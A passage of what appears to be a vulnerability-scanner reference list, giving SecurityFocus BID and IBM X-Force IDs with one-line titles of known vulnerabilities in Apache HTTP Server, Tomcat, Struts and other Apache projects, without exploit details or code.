6415| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
6416| [44616] Apache Shiro Directory Traversal Vulnerability
6417| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
6418| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
6419| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
6420| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
6421| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
6422| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
6423| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
6424| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
6425| [42492] Apache CXF XML DTD Processing Security Vulnerability
6426| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
6427| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
6428| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
6429| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
6430| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
6431| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
6432| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
6433| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
6434| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
6435| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
6436| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
6437| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
6438| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
6439| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
6440| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
6441| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
6442| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
6443| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
6444| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
6445| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
6446| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
6447| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
6448| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
6449| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
6450| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
6451| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
6452| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
6453| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
6454| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
6455| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
6456| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
6457| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
6458| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
6459| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
6460| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
6461| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
6462| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
6463| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
6464| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
6465| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
6466| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
6467| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
6468| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
6469| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
6470| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
6471| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
6472| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
6473| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
6474| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
6475| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
6476| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
6477| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
6478| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
6479| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
6480| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
6481| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
6482| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
6483| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
6484| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
6485| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
6486| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
6487| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
6488| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
6489| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
6490| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
6491| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
6492| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
6493| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
6494| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
6495| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
6496| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
6497| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
6498| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
6499| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
6500| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
6501| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
6502| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
6503| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
6504| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
6505| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
6506| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
6507| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
6508| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
6509| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
6510| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
6511| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
6512| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
6513| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
6514| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
6515| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
6516| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
6517| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
6518| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
6519| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
6520| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
6521| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
6522| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
6523| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
6524| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
6525| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
6526| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
6527| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
6528| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
6529| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
6530| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
6531| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
6532| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
6533| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
6534| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
6535| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
6536| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
6537| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
6538| [20527] Apache Mod_TCL Remote Format String Vulnerability
6539| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
6540| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
6541| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
6542| [19106] Apache Tomcat Information Disclosure Vulnerability
6543| [18138] Apache James SMTP Denial Of Service Vulnerability
6544| [17342] Apache Struts Multiple Remote Vulnerabilities
6545| [17095] Apache Log4Net Denial Of Service Vulnerability
6546| [16916] Apache mod_python FileSession Code Execution Vulnerability
6547| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
6548| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
6549| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
6550| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
6551| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
6552| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
6553| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
6554| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
6555| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
6556| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
6557| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
6558| [15177] PHP Apache 2 Local Denial of Service Vulnerability
6559| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
6560| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
6561| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
6562| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
6563| [14106] Apache HTTP Request Smuggling Vulnerability
6564| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
6565| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
6566| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
6567| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
6568| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
6569| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
6570| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
6571| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
6572| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
6573| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
6574| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
6575| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
6576| [11471] Apache mod_include Local Buffer Overflow Vulnerability
6577| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
6578| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
6579| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
6580| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
6581| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
6582| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
6583| [11094] Apache mod_ssl Denial Of Service Vulnerability
6584| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
6585| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
6586| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
6587| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
6588| [10478] ClueCentral Apache Suexec Patch Security Weakness
6589| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
6590| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
6591| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
6592| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
6593| [9921] Apache Connection Blocking Denial Of Service Vulnerability
6594| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
6595| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
6596| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
6597| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
6598| [9733] Apache Cygwin Directory Traversal Vulnerability
6599| [9599] Apache mod_php Global Variables Information Disclosure Weakness
6600| [9590] Apache-SSL Client Certificate Forging Vulnerability
6601| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
6602| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
6603| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
6604| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
6605| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
6606| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
6607| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
6608| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
6609| [8898] Red Hat Apache Directory Index Default Configuration Error
6610| [8883] Apache Cocoon Directory Traversal Vulnerability
6611| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
6612| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
6613| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
6614| [8707] Apache htpasswd Password Entropy Weakness
6615| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
6616| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
6617| [8226] Apache HTTP Server Multiple Vulnerabilities
6618| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
6619| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
6620| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
6621| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
6622| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
6623| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
6624| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
6625| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
6626| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
6627| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
6628| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
6629| [7255] Apache Web Server File Descriptor Leakage Vulnerability
6630| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
6631| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
6632| [6939] Apache Web Server ETag Header Information Disclosure Weakness
6633| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
6634| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
6635| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
6636| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
6637| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
6638| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
6639| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
6640| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
6641| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
6642| [6117] Apache mod_php File Descriptor Leakage Vulnerability
6643| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
6644| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
6645| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
6646| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
6647| [5992] Apache HTDigest Insecure Temporary File Vulnerability
6648| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
6649| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
6650| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
6651| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
6652| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
6653| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
6654| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
6655| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
6656| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
6657| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
6658| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
6659| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
6660| [5485] Apache 2.0 Path Disclosure Vulnerability
6661| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
6662| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
6663| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
6664| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
6665| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
6666| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
6667| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
6668| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
6669| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
6670| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
6671| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
6672| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
6673| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
6674| [4437] Apache Error Message Cross-Site Scripting Vulnerability
6675| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
6676| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
6677| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
6678| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
6679| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
6680| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
6681| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
6682| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
6683| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
6684| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
6685| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
6686| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
6687| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
6688| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
6689| [3596] Apache Split-Logfile File Append Vulnerability
6690| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
6691| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
6692| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
6693| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
6694| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
6695| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
6696| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
6697| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
6698| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
6699| [3169] Apache Server Address Disclosure Vulnerability
6700| [3009] Apache Possible Directory Index Disclosure Vulnerability
6701| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
6702| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
6703| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
6704| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
6705| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
6706| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
6707| [2216] Apache Web Server DoS Vulnerability
6708| [2182] Apache /tmp File Race Vulnerability
6709| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
6710| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
6711| [1821] Apache mod_cookies Buffer Overflow Vulnerability
6712| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
6713| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
6714| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
6715| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
6716| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
6717| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
6718| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
6719| [1457] Apache::ASP source.asp Example Script Vulnerability
6720| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
6721| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
6722|
6723| IBM X-Force - https://exchange.xforce.ibmcloud.com:
6724| [86258] Apache CloudStack text fields cross-site scripting
6725| [85983] Apache Subversion mod_dav_svn module denial of service
6726| [85875] Apache OFBiz UEL code execution
6727| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
6728| [85871] Apache HTTP Server mod_session_dbd unspecified
6729| [85756] Apache Struts OGNL expression command execution
6730| [85755] Apache Struts DefaultActionMapper class open redirect
6731| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
6732| [85574] Apache HTTP Server mod_dav denial of service
6733| [85573] Apache Struts Showcase App OGNL code execution
6734| [85496] Apache CXF denial of service
6735| [85423] Apache Geronimo RMI classloader code execution
6736| [85326] Apache Santuario XML Security for C++ buffer overflow
6737| [85323] Apache Santuario XML Security for Java spoofing
6738| [85319] Apache Qpid Python client SSL spoofing
6739| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
6740| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
6741| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
6742| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
6743| [84952] Apache Tomcat CVE-2012-3544 denial of service
6744| [84763] Apache Struts CVE-2013-2135 security bypass
6745| [84762] Apache Struts CVE-2013-2134 security bypass
6746| [84719] Apache Subversion CVE-2013-2088 command execution
6747| [84718] Apache Subversion CVE-2013-2112 denial of service
6748| [84717] Apache Subversion CVE-2013-1968 denial of service
6749| [84577] Apache Tomcat security bypass
6750| [84576] Apache Tomcat symlink
6751| [84543] Apache Struts CVE-2013-2115 security bypass
6752| [84542] Apache Struts CVE-2013-1966 security bypass
6753| [84154] Apache Tomcat session hijacking
6754| [84144] Apache Tomcat denial of service
6755| [84143] Apache Tomcat information disclosure
6756| [84111] Apache HTTP Server command execution
6757| [84043] Apache Virtual Computing Lab cross-site scripting
6758| [84042] Apache Virtual Computing Lab cross-site scripting
6759| [83782] Apache CloudStack information disclosure
6760| [83781] Apache CloudStack security bypass
6761| [83720] Apache ActiveMQ cross-site scripting
6762| [83719] Apache ActiveMQ denial of service
6763| [83718] Apache ActiveMQ denial of service
6764| [83263] Apache Subversion denial of service
6765| [83262] Apache Subversion denial of service
6766| [83261] Apache Subversion denial of service
6767| [83259] Apache Subversion denial of service
6768| [83035] Apache mod_ruid2 security bypass
6769| [82852] Apache Qpid federation_tag security bypass
6770| [82851] Apache Qpid qpid::framing::Buffer denial of service
6771| [82758] Apache Rave User RPC API information disclosure
6772| [82663] Apache Subversion svn_fs_file_length() denial of service
6773| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
6774| [82641] Apache Qpid AMQP denial of service
6775| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
6776| [82618] Apache Commons FileUpload symlink
6777| [82360] Apache HTTP Server manager interface cross-site scripting
6778| [82359] Apache HTTP Server hostnames cross-site scripting
6779| [82338] Apache Tomcat log/logdir information disclosure
6780| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
6781| [82268] Apache OpenJPA deserialization command execution
6782| [81981] Apache CXF UsernameTokens security bypass
6783| [81980] Apache CXF WS-Security security bypass
6784| [81398] Apache OFBiz cross-site scripting
6785| [81240] Apache CouchDB directory traversal
6786| [81226] Apache CouchDB JSONP code execution
6787| [81225] Apache CouchDB Futon user interface cross-site scripting
6788| [81211] Apache Axis2/C SSL spoofing
6789| [81167] Apache CloudStack DeployVM information disclosure
6790| [81166] Apache CloudStack AddHost API information disclosure
6791| [81165] Apache CloudStack createSSHKeyPair API information disclosure
6792| [80518] Apache Tomcat cross-site request forgery security bypass
6793| [80517] Apache Tomcat FormAuthenticator security bypass
6794| [80516] Apache Tomcat NIO denial of service
6795| [80408] Apache Tomcat replay-countermeasure security bypass
6796| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
6797| [80317] Apache Tomcat slowloris denial of service
6798| [79984] Apache Commons HttpClient SSL spoofing
6799| [79983] Apache CXF SSL spoofing
6800| [79830] Apache Axis2/Java SSL spoofing
6801| [79829] Apache Axis SSL spoofing
6802| [79809] Apache Tomcat DIGEST security bypass
6803| [79806] Apache Tomcat parseHeaders() denial of service
6804| [79540] Apache OFBiz unspecified
6805| [79487] Apache Axis2 SAML security bypass
6806| [79212] Apache Cloudstack code execution
6807| [78734] Apache CXF SOAP Action security bypass
6808| [78730] Apache Qpid broker denial of service
6809| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
6810| [78563] Apache mod_pagespeed module unspecified cross-site scripting
6811| [78562] Apache mod_pagespeed module security bypass
6812| [78454] Apache Axis2 security bypass
6813| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
6814| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
6815| [78321] Apache Wicket unspecified cross-site scripting
6816| [78183] Apache Struts parameters denial of service
6817| [78182] Apache Struts cross-site request forgery
6818| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
6819| [77987] mod_rpaf module for Apache denial of service
6820| [77958] Apache Struts skill name code execution
6821| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
6822| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
6823| [77568] Apache Qpid broker security bypass
6824| [77421] Apache Libcloud spoofing
6825| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
6826| [77046] Oracle Solaris Apache HTTP Server information disclosure
6827| [76837] Apache Hadoop information disclosure
6828| [76802] Apache Sling CopyFrom denial of service
6829| [76692] Apache Hadoop symlink
6830| [76535] Apache Roller console cross-site request forgery
6831| [76534] Apache Roller weblog cross-site scripting
6832| [76152] Apache CXF elements security bypass
6833| [76151] Apache CXF child policies security bypass
6834| [75983] MapServer for Windows Apache file include
6835| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
6836| [75558] Apache POI denial of service
6837| [75545] PHP apache_request_headers() buffer overflow
6838| [75302] Apache Qpid SASL security bypass
6839| [75211] Debian GNU/Linux apache 2 cross-site scripting
6840| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
6841| [74871] Apache OFBiz FlexibleStringExpander code execution
6842| [74870] Apache OFBiz multiple cross-site scripting
6843| [74750] Apache Hadoop unspecified spoofing
6844| [74319] Apache Struts XSLTResult.java file upload
6845| [74313] Apache Traffic Server header buffer overflow
6846| [74276] Apache Wicket directory traversal
6847| [74273] Apache Wicket unspecified cross-site scripting
6848| [74181] Apache HTTP Server mod_fcgid module denial of service
6849| [73690] Apache Struts OGNL code execution
6850| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
6851| [73100] Apache MyFaces in directory traversal
6852| [73096] Apache APR hash denial of service
6853| [73052] Apache Struts name cross-site scripting
6854| [73030] Apache CXF UsernameToken security bypass
6855| [72888] Apache Struts lastName cross-site scripting
6856| [72758] Apache HTTP Server httpOnly information disclosure
